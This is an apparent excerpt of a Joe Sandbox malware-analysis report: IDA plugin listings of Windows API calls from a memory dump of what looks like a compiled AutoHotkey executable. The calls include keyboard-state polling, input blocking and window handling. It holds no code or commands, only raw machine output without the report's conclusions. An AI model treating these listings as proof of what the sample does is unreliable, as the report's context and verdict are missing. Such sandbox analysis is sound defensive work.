    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 004849ED: GetModuleHandleW.KERNEL32(mscoree.dll,?,00484A25,004011C4,?,00484988,000000FF,0000001E,00000001,00000000,00000000,?,0048AC0F,004011C4,00000001,004011C4), ref: 004849F7
      • Part of subcall function 004849ED: GetProcAddress.KERNEL32(00000000,CorExitProcess,?,00484A25,004011C4,?,00484988,000000FF,0000001E,00000001,00000000,00000000,?,0048AC0F,004011C4,00000001), ref: 00484A07
    • ExitProcess.KERNEL32 ref: 00484A29
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0048E9C3: RtlAllocateHeap.NTDLL(00000008,004719BE,00000000), ref: 0048EA06
    • Sleep.KERNEL32(00000000,004719BE,004011C4), ref: 0048AC6B
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd

    Non-executed Functions

    APIs
    • InvalidateRect.USER32(00000013,?,00000000), ref: 0045F42F
      • Part of subcall function 00485D47: RtlReAllocateHeap.NTDLL(00000000,00000000,0049555D,00000000), ref: 00485D86
      • Part of subcall function 00485D47: GetLastError.KERNEL32(?,0048ACA3,00420EBC,0049555D,00000000,00000000,?,004852B4,00000000,00000010,?,?,0048533E,00420EBC,004A15D8,0000000C), ref: 00485DC9
      • Part of subcall function 00485D47: GetLastError.KERNEL32(?,0048ACA3,00420EBC,0049555D,00000000,00000000,?,004852B4,00000000,00000010,?,?,0048533E,00420EBC,004A15D8,0000000C), ref: 00485DE1
    • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045C8FB
    • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045C929
      • Part of subcall function 004625E0: SendMessageA.USER32(00000000,00001037,00000000,00000000), ref: 00462606
      • Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 004601BB
      • Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460248
      • Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460361
      • Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460466
      • Part of subcall function 004600C0: EnableWindow.USER32(?,00000000), ref: 0046049F
      • Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 004604D1
      • Part of subcall function 004600C0: ShowWindow.USER32(?,-00000001), ref: 0046050E
      • Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 004605C5
      • Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 004606BF
      • Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 004606EC
      • Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 004607E1
      • Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 0046085F
      • Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460887
      • Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 004608D3
      • Part of subcall function 004600C0: SendMessageA.USER32(-000000F2,000000CF,00000000,00000000), ref: 00460995
      • Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460BCE
      • Part of subcall function 004600C0: SendMessageA.USER32(?,000000CC,?,00000000), ref: 00460C18
      • Part of subcall function 004600C0: SendMessageA.USER32(?,000000CC,00000000,00000000), ref: 00460C3B
      • Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460C4E
      • Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460CBF
      • Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460DC8
      • Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460E06
      • Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460E74
      • Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460EA8
      • Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460EDF
      • Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 00460F85
      • Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 0046106B
      • Part of subcall function 004600C0: SendMessageA.USER32(?,-00001013,00000000,?), ref: 0046111F
      • Part of subcall function 004600C0: __Stoull.NTSTC_LIBCMT ref: 004611E2
      • Part of subcall function 004600C0: GetClassInfoExA.USER32(00400000,?,?), ref: 004611FE
      • Part of subcall function 004600C0: GetWindowLongA.USER32(-000000E6,000000F0), ref: 004614EE
      • Part of subcall function 004600C0: MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461808
      • Part of subcall function 004600C0: GetWindowLongA.USER32(?,000000F0), ref: 00461D04
      • Part of subcall function 004600C0: SendMessageA.USER32(00000001,00000401,00000001,00000000), ref: 00461E5B
      • Part of subcall function 004600C0: GetWindowLongA.USER32(00000000,000000F0), ref: 00461E87
      • Part of subcall function 004600C0: SendMessageA.USER32(?,000000F4,00000000), ref: 00461EAB
      • Part of subcall function 004600C0: SendMessageA.USER32(?,00000401,?,00000000), ref: 00461ECE
      • Part of subcall function 004600C0: SendMessageA.USER32(?,0000108E,?,00000000), ref: 00461F6A
      • Part of subcall function 004600C0: SendMessageA.USER32(?,000000C5,00000000,00000000), ref: 00461FAC
      • Part of subcall function 004600C0: SendMessageA.USER32(?,00000403,?,00000006), ref: 00461FF5
      • Part of subcall function 004600C0: SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00462034
      • Part of subcall function 004600C0: GetWindowRect.USER32(?,?), ref: 0046205B
      • Part of subcall function 004600C0: SendMessageA.USER32(?,000000F4,?,00000001), ref: 004620A4
      • Part of subcall function 004600C0: SetLastError.KERNEL32(00000000), ref: 004620A8
      • Part of subcall function 004600C0: SetWindowLongA.USER32(?,000000F0,?), ref: 004620B8
      • Part of subcall function 004600C0: GetLastError.KERNEL32(?,000000F0,?), ref: 004620C2
      • Part of subcall function 004600C0: GetWindowLongA.USER32(00000000,000000F0), ref: 004620D1
      • Part of subcall function 004600C0: GetWindowLongA.USER32(?,000000EC), ref: 004620E8
      • Part of subcall function 004600C0: SetLastError.KERNEL32(00000000), ref: 0046211B
      • Part of subcall function 004600C0: SetWindowLongA.USER32(00000000,000000EC,?), ref: 00462127
      • Part of subcall function 004600C0: GetLastError.KERNEL32 ref: 00462131
      • Part of subcall function 004600C0: GetWindowLongA.USER32(?,000000EC), ref: 00462140
      • Part of subcall function 004600C0: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 00462169
      • Part of subcall function 004600C0: SendMessageA.USER32(00000000,00001036,00000000,00000000), ref: 00462193
      • Part of subcall function 004600C0: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 004621A1
      • Part of subcall function 004600C0: SendMessageA.USER32(00000000,0000041D,00000000,00000000), ref: 0046222B
      • Part of subcall function 004600C0: SendMessageA.USER32(06060606,00000192,?,?), ref: 004622BA
      • Part of subcall function 004600C0: SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 004622F5
      • Part of subcall function 004600C0: InvalidateRect.USER32(?,00000000,00000001), ref: 0046231B
      • Part of subcall function 004719E0: _vswprintf_s.LIBCMT ref: 00471A13
      • Part of subcall function 0041F080: _strncpy.LIBCMT ref: 0041F0D2
      • Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041F14D
      • Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041F310
      • Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041F4B6
      • Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041F71A
      • Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041FC2B
      • Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041FFC1
      • Part of subcall function 0041F080: _strncpy.LIBCMT ref: 00420241
    • MulDiv.KERNEL32(00000008,00000060,00000060), ref: 0045CFEA
      • Part of subcall function 00466E80: GetWindowRect.USER32(?,?), ref: 00466E8D
      • Part of subcall function 00466E80: ScreenToClient.USER32(?,?), ref: 00466EA9
      • Part of subcall function 00466E80: GetClientRect.USER32(?,00000000), ref: 00466EB7
      • Part of subcall function 00466E80: GetWindowLongA.USER32(?,000000F0), ref: 00466EC2
      • Part of subcall function 00466E80: SetWindowLongA.USER32 ref: 00466EEE
      • Part of subcall function 00466E80: SendMessageA.USER32(?,00001328,00000000,00000000), ref: 00466F09
      • Part of subcall function 00466E80: SetWindowLongA.USER32(?,000000F0,00000000), ref: 00466F18
      • Part of subcall function 00466E80: SendMessageA.USER32(00000000,0000132C,00000000,00000000), ref: 00466F2A
    • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045D124
    • GetDC.USER32(?), ref: 0045D200
    • SelectObject.GDI32(00000000,?), ref: 0045D21E
    • GetTextMetricsA.GDI32(00000000,?), ref: 0045D231
    • MulDiv.KERNEL32(00000008,00000060,00000060), ref: 0045D2A5
    • GetSystemMetrics.USER32(00000003), ref: 0045D2BE
    • MulDiv.KERNEL32(-00000002,00000060,00000060), ref: 0045D2EA
    • MulDiv.KERNEL32(0000001E,00000060,00000060), ref: 0045D326
    • GetDC.USER32(?), ref: 0045D39D
    • SelectObject.GDI32(00000000,?), ref: 0045D3BB
    • GetTextMetricsA.GDI32(00000000,?), ref: 0045D3CE
    • GetSystemMetrics.USER32(00000002), ref: 0045D3EE
    • GetDC.USER32(?), ref: 0045D449
    • SelectObject.GDI32(00000000,?), ref: 0045D467
    • GetTextMetricsA.GDI32(00000000,?), ref: 0045D4A3
    • GetSystemMetrics.USER32(00000047), ref: 0045D4AB
    • GetSystemMetrics.USER32(00000005), ref: 0045D4DB
    • GetSystemMetrics.USER32(00000006), ref: 0045D4EB
    • DrawTextA.USER32(?,?,000000FF,?,?), ref: 0045D6B9
    • DrawTextA.USER32(00000000,?,000000FF,?,00000400), ref: 0045D6F4
    • GetCharABCWidthsA.GDI32(00000000,00000000,00000000,?), ref: 0045D760
    • MulDiv.KERNEL32(00000008,00000060,00000060), ref: 0045D7B6
    • GetSystemMetrics.USER32(00000003), ref: 0045D7CF
    • GetSystemMetrics.USER32(0000002D), ref: 0045D827
    • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045D87F
    • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045D8E5
      • Part of subcall function 00466570: MulDiv.KERNEL32(?,00000060,00000060), ref: 00466598
      • Part of subcall function 00466570: MulDiv.KERNEL32(?,00000060,00000060), ref: 004665AE
    • GetDC.USER32(?), ref: 0045D97E
    • SelectObject.GDI32(00000000,?), ref: 0045D99A
    • GetTextMetricsA.GDI32(00000000,?), ref: 0045D9B1
    • MulDiv.KERNEL32(00000008,00000060,00000060), ref: 0045D9C2
    • GetSystemMetrics.USER32(00000003), ref: 0045D9EA
    • IsWindowVisible.USER32(?), ref: 0045DA82
    • IsIconic.USER32(?), ref: 0045DA90
    • GetWindowLongA.USER32(?,000000F0), ref: 0045DABC
    • SendMessageA.USER32(?,0000130B,00000000,00000000), ref: 0045DAD5
    • CreateWindowExA.USER32(?,static,?,?,?,?,?,80000000,?,-00000003,00400000,00000000), ref: 0045DB54
    • CreateWindowExA.USER32(?,static,?,?,?,?,80000000,80000000,?,?,00400000,00000000), ref: 0045DC1A
      • Part of subcall function 004628B0: SendMessageA.USER32(?,00000172,00000002,00000000), ref: 004628FE
      • Part of subcall function 004628B0: DestroyCursor.USER32(00000000), ref: 00462901
      • Part of subcall function 004628B0: SendMessageA.USER32(?,00000172,00000000,00000000), ref: 00462913
      • Part of subcall function 004628B0: DeleteObject.GDI32(00000000), ref: 00462916
      • Part of subcall function 004628B0: DestroyCursor.USER32(?), ref: 00462950
      • Part of subcall function 004628B0: GetWindowLongA.USER32(?,000000F0), ref: 00462960
      • Part of subcall function 004628B0: SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 00462990
      • Part of subcall function 004628B0: SendMessageA.USER32(?,00000172,?,?), ref: 004629A3
      • Part of subcall function 004628B0: SendMessageA.USER32(00000000,00000173,?,00000000), ref: 004629B0
      • Part of subcall function 004628B0: DeleteObject.GDI32(?), ref: 004629C4
      • Part of subcall function 004628B0: DestroyCursor.USER32(?), ref: 004629CC
    • CreateWindowExA.USER32(?,button,?,?,?,?,?,80000000,?,?,00400000,00000000), ref: 0045DCA8
    • CreateWindowExA.USER32(?,button,?,?,?,?,?,80000000,?,?,00400000,00000000), ref: 0045DCFB
    • GetWindowLongA.USER32(?,000000F0), ref: 0045DD2D
    • SendMessageA.USER32(?,000000F4,00000000), ref: 0045DD51
    • SendMessageA.USER32(?,00000401,-00000003,00000000), ref: 0045DD70
    • SendMessageA.USER32(?,000000F4,00000001,00000001), ref: 0045DD83
    • CreateWindowExA.USER32(?,button,?,?,?,?,?,80000000,?,7619AD28,00400000,00000000), ref: 0045DDCF
    • SendMessageA.USER32(00000000,000000F1,?,00000000), ref: 0045DDF8
    • CreateWindowExA.USER32(?,Combobox,004987E9,00000001,?,?,?,80000000,?,7619AD28,00400000,00000000), ref: 0045DE5A
    • SendMessageA.USER32(00000000,00000030,?,00000000), ref: 0045DE8B
    • SendMessageA.USER32(00000000,00000154,00000000,00000000), ref: 0045DEAA
    • MulDiv.KERNEL32(00000008,00000060,00000060), ref: 0045DED5
    • MulDiv.KERNEL32(00000008,00000060,00000060), ref: 0045DF10
    • MoveWindow.USER32(?,?,?,?,80000000,00000001), ref: 0045DF58
    • SelectObject.GDI32(?,?), ref: 0045E6AA
    • ReleaseDC.USER32(?,?), ref: 0045E6B5
    • SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000013), ref: 0045F44C
      • Part of subcall function 00466470: CheckRadioButton.USER32(00000006,?,?,-00000004), ref: 004664A8
      • Part of subcall function 00466470: SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 004664F5
      • Part of subcall function 00466470: GetWindowLongA.USER32(00000000,000000F0), ref: 00466502
      • Part of subcall function 00466470: SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 00466511
      • Part of subcall function 00473E10: __ultow.LIBCMT ref: 00473E22
      • Part of subcall function 00473B50: LoadLibraryA.KERNEL32(uxtheme), ref: 00473B5C
      • Part of subcall function 00473B50: GetProcAddress.KERNEL32(00000000,SetWindowTheme,?,?), ref: 00473B6E
      • Part of subcall function 00473B50: FreeLibrary.KERNEL32(00000000,?,?), ref: 00473B8C
    • SendMessageA.USER32(?,00000030,?,?), ref: 0045F28C
    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0045F2A6
    • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 0045F462
      • Part of subcall function 00462640: SendMessageA.USER32(?,00001304,00000000,00000000), ref: 0046267E
      • Part of subcall function 00462640: GetWindowLongA.USER32(?,000000F0), ref: 004626AD
      • Part of subcall function 00462640: SendMessageA.USER32(?,?,00000000,?), ref: 00462736
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000101B,?,?), ref: 00462771
      • Part of subcall function 00462640: SendMessageA.USER32(?,?,00000000,00000000), ref: 004627CD
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000108F,00000000,00000000), ref: 00462803
      • Part of subcall function 00462640: GetWindowLongA.USER32(?,000000F0), ref: 0046280A
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000101E,00000000,0000FFFE), ref: 0046282E
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000130C,?,00000000), ref: 00462850
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000014E,00000001,?), ref: 0046286E
      • Part of subcall function 00462640: SendMessageA.USER32(0000014E,0000014E,?,00000000), ref: 00462880
    • GetClientRect.USER32(?,?), ref: 0045F2EF
    • SetWindowLongA.USER32(?,000000F0,?), ref: 0045F319
    • SendMessageA.USER32(?,00001328,00000001,?), ref: 0045F32F
    • SetWindowLongA.USER32(?,000000F0,?), ref: 0045F344
    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0045F378
    • GetWindowRect.USER32(?,?), ref: 0045F38E
    • SendMessageA.USER32(?,00000194,?,00000000), ref: 0045F3E7
    • GetWindowRect.USER32(?,?), ref: 0045F40B
    • MapWindowPoints.USER32(00000000,00000013,?,00000002), ref: 0045F41E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • FindResourceA.KERNEL32 ref: 00416262
    • FindResourceA.KERNEL32(00000000,>AHK WITH ICON<,0000000A), ref: 00416272
    • SizeofResource.KERNEL32(00000000,00000000), ref: 00416282
    • LoadResource.KERNEL32(00000000,00000000), ref: 00416299
    • LockResource.KERNEL32(00000000), ref: 004162A8
      • Part of subcall function 004148B0: GetCPInfo.KERNEL32(000004E4,?,?,004162C6), ref: 004148E1
      • Part of subcall function 0046F550: GetCPInfo.KERNEL32(0000FDE9,?,?,004162E2,0000000C), ref: 0046F595
      • Part of subcall function 0046F550: GetCPInfo.KERNEL32(0000FDE9,?,?,004162E2,0000000C), ref: 0046F62F
      • Part of subcall function 004184A0: __Stoull.NTSTC_LIBCMT ref: 0041850C
      • Part of subcall function 004184A0: __Stoull.NTSTC_LIBCMT ref: 0041856A
    • __Stoull.NTSTC_LIBCMT ref: 00416332
    • __Stoull.NTSTC_LIBCMT ref: 00416380
      • Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230
      • Part of subcall function 00418630: __Stoull.NTSTC_LIBCMT ref: 00418A49
      • Part of subcall function 00418630: __Stoull.NTSTC_LIBCMT ref: 00418A64
      • Part of subcall function 00418630: __Stoull.NTSTC_LIBCMT ref: 00418A88
      • Part of subcall function 00418630: __Stoull.NTSTC_LIBCMT ref: 00418AAB
      • Part of subcall function 00418630: _strncpy.LIBCMT ref: 00418D52
      • Part of subcall function 00418630: __Stoull.NTSTC_LIBCMT ref: 00418E01
      • Part of subcall function 00418630: _strncpy.LIBCMT ref: 00419298
      • Part of subcall function 00418630: GetKeyboardLayout.USER32(00000000), ref: 0041942F
    • __Stoull.NTSTC_LIBCMT ref: 004163F2
    • __Stoull.NTSTC_LIBCMT ref: 0041645F
    • __Stoull.NTSTC_LIBCMT ref: 004165F5
    • __Stoull.NTSTC_LIBCMT ref: 0041660E
    • __Stoull.NTSTC_LIBCMT ref: 004166AA
    • __Stoull.NTSTC_LIBCMT ref: 0041677F
    • _strncpy.LIBCMT ref: 0041679D
    • __Stoull.NTSTC_LIBCMT ref: 00416861
    • __Stoull.NTSTC_LIBCMT ref: 00416880
      • Part of subcall function 0041E290: __Stoull.NTSTC_LIBCMT ref: 0041E316
      • Part of subcall function 0041D7B0: _strncpy.LIBCMT ref: 0041D936
      • Part of subcall function 0041D7B0: _strncpy.LIBCMT ref: 0041DE0E
    • __Stoull.NTSTC_LIBCMT ref: 00416D63
    • __Stoull.NTSTC_LIBCMT ref: 00416D77
      • Part of subcall function 00416120: __Stoull.NTSTC_LIBCMT ref: 0041612B
    • __Stoull.NTSTC_LIBCMT ref: 00416F8F
      • Part of subcall function 0040B610: _strncpy.LIBCMT ref: 0040B633
    • GetKeyboardLayout.USER32(00000000), ref: 004173EF
    • VkKeyScanExA.USER32(?,00000000), ref: 00417421
    • GetKeyboardLayout.USER32(00000000), ref: 0041762D
    • VkKeyScanExA.USER32(?,00000000), ref: 00417685
      • Part of subcall function 004123B0: MapVirtualKeyA.USER32(-0000011D,00000001), ref: 00412438
    • IsCharUpperA.USER32(00000000), ref: 0041778A
    • _strncpy.LIBCMT ref: 004177CB
    • _strncpy.LIBCMT ref: 004177EA
      • Part of subcall function 0040BE10: _strncpy.LIBCMT ref: 0040BFEB
      • Part of subcall function 0040BE10: _strncpy.LIBCMT ref: 0040C075
      • Part of subcall function 004719A0: _vswprintf_s.LIBCMT ref: 004719B9
      • Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
      • Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0
      • Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 00419E16
      • Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 00419E5C
      • Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 00419E7D
      • Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 0041A5B4
      • Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 0041A710
      • Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 0041A743
      • Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 0041A7AD
      • Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 0041A840
      • Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 0041A885
      • Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 0041A8AE
      • Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 0041A8DD
      • Part of subcall function 00419D60: __Stoull.NTSTC_LIBCMT ref: 0041ADC4
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • __Stoull.NTSTC_LIBCMT ref: 0040D510
    • GetForegroundWindow.USER32 ref: 0040E57E
      • Part of subcall function 00408BC0: CloseHandle.KERNEL32(00000000), ref: 00408BD3
      • Part of subcall function 00408BC0: CreateMutexA.KERNEL32(00000000,00000000,AHK Keybd,?,001BC918,?,0040D550), ref: 00408BDE
      • Part of subcall function 00408BC0: GetLastError.KERNEL32 ref: 00408BE6
      • Part of subcall function 00408BC0: CloseHandle.KERNEL32(00000000), ref: 00408C0D
      • Part of subcall function 00408C20: CloseHandle.KERNEL32(00000000), ref: 00408C33
      • Part of subcall function 00408C20: CreateMutexA.KERNEL32(00000000,00000000,AHK Mouse,?,001BC918,?,0040D55D), ref: 00408C3E
      • Part of subcall function 00408C20: GetLastError.KERNEL32 ref: 00408C46
      • Part of subcall function 00408C20: CloseHandle.KERNEL32(00000000), ref: 00408C6D
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0040D5C2
      • Part of subcall function 00476550: GetModuleHandleA.KERNEL32(user32,IsHungAppWindow,?,004755DA), ref: 00476576
      • Part of subcall function 00476550: GetProcAddress.KERNEL32(00000000,?,004755DA), ref: 0047657D
      • Part of subcall function 00476550: SendMessageTimeoutA.USER32(00000000,00000000,00000000,00000000,00000002,00001388,00000000), ref: 004765AF
    • AttachThreadInput.USER32(00000E10,00000000,00000001), ref: 0040D5F8
    • GetTickCount.KERNEL32 ref: 0040D618
    • GetCurrentThreadId.KERNEL32 ref: 0040D64F
    • GetAsyncKeyState.USER32(0000005B), ref: 0040D688
    • GetAsyncKeyState.USER32(0000005C), ref: 0040D696
    • GetForegroundWindow.USER32 ref: 0040D6F2
    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040D6FF
    • GetKeyboardLayout.USER32(00000000), ref: 0040D708
      • Part of subcall function 00411970: VkKeyScanExA.USER32(00000020,00000000), ref: 004119F6
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A0), ref: 00411465
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A1), ref: 00411478
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A2), ref: 0041148C
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A3), ref: 004114A0
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A4), ref: 004114B4
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A5), ref: 004114C8
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(0000005B), ref: 004114D9
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(0000005C), ref: 004114EA
    • GetTickCount.KERNEL32 ref: 0040D757
    • GetWindowThreadProcessId.USER32(00000000), ref: 0040E585
      • Part of subcall function 00410C30: GetKeyState.USER32(?), ref: 00410C3B
      • Part of subcall function 00410C30: GetKeyState.USER32(?), ref: 00410C6A
      • Part of subcall function 00410C30: GetForegroundWindow.USER32 ref: 00410CA4
      • Part of subcall function 00410C30: GetWindowThreadProcessId.USER32(00000000), ref: 00410CAB
      • Part of subcall function 00410C30: GetKeyState.USER32(00000014), ref: 00410CEE
    • GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040D88C
    • GetProcAddress.KERNEL32(00000000), ref: 0040D893
    • GetTickCount.KERNEL32 ref: 0040D8E1
    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040D906
    • GetTickCount.KERNEL32 ref: 0040D930
    • __Stoull.NTSTC_LIBCMT ref: 0040DA37
    • __Stoull.NTSTC_LIBCMT ref: 0040DA4B
    • __Stoull.NTSTC_LIBCMT ref: 0040DA84
      • Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230
      • Part of subcall function 00410200: GetCursorPos.USER32(004A9140), ref: 00410298
      • Part of subcall function 00410200: GetCursorPos.USER32(?), ref: 004102B5
      • Part of subcall function 00410200: GetSystemMetrics.USER32(00000000), ref: 00410310
      • Part of subcall function 00410200: GetSystemMetrics.USER32(00000001), ref: 00410316
      • Part of subcall function 00410200: GetCursorPos.USER32(?), ref: 00410375
    • __Stoull.NTSTC_LIBCMT ref: 0040DB33
    • __Stoull.NTSTC_LIBCMT ref: 0040DBA2
    • __Stoull.NTSTC_LIBCMT ref: 0040DBBC
    • PostMessageA.USER32(?,00000102,?,00000000), ref: 0040DD0A
    • GetAsyncKeyState.USER32(000000A0), ref: 0040DDA2
    • GetAsyncKeyState.USER32(000000A1), ref: 0040DDB5
    • GetAsyncKeyState.USER32(000000A2), ref: 0040DDC9
    • GetAsyncKeyState.USER32(000000A3), ref: 0040DDDD
    • GetAsyncKeyState.USER32(000000A4), ref: 0040DDF1
    • GetAsyncKeyState.USER32(000000A5), ref: 0040DE05
    • GetAsyncKeyState.USER32(0000005B), ref: 0040DE16
    • GetAsyncKeyState.USER32(0000005C), ref: 0040DE27
    • GetTickCount.KERNEL32 ref: 0040DEC9
    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040DEEE
    • GetTickCount.KERNEL32 ref: 0040DF18
    • __Stoull.NTSTC_LIBCMT ref: 0040DF44
    • __Stoull.NTSTC_LIBCMT ref: 0040DFC0
    • PostMessageW.USER32(00000000,00000102,?,00000000), ref: 0040DFF1
    • __itow.LIBCMT ref: 0040E021
      • Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A0), ref: 0040EB06
      • Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A1), ref: 0040EB19
      • Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A2), ref: 0040EB2D
      • Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A3), ref: 0040EB41
      • Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A4), ref: 0040EB55
      • Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A5), ref: 0040EB69
      • Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(0000005B), ref: 0040EB7A
      • Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(0000005C), ref: 0040EB8B
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A0), ref: 0040D0D5
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A1), ref: 0040D0E8
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A2), ref: 0040D0FC
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A3), ref: 0040D110
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A4), ref: 0040D124
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A5), ref: 0040D138
